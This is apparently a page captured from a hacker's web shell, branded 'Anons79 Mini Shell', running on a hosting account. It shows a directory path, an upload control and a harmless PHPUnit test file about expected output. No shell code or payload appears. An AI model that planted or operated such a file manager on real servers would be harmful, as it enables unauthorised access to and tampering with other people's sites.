Anons79 Mini Shell

Directory : /home/proudlyafrican/public_html/vendor/phpunit/phpunit/tests/_files/
Upload File :
Current File : /home/proudlyafrican/public_html/vendor/phpunit/phpunit/tests/_files/OutputTestCase.php

<?php
class OutputTestCase extends PHPUnit_Framework_TestCase
{
    public function testExpectOutputStringFooActualFoo()
    {
        $this->expectOutputString('foo');
        print 'foo';
    }

    public function testExpectOutputStringFooActualBar()
    {
        $this->expectOutputString('foo');
        print 'bar';
    }

    public function testExpectOutputRegexFooActualFoo()
    {
        $this->expectOutputRegex('/foo/');
        print 'foo';
    }

    public function testExpectOutputRegexFooActualBar()
    {
        $this->expectOutputRegex('/foo/');
        print 'bar';
    }
}

Anons79 File Manager Version 1.0, Coded By Anons79
Email: [email protected]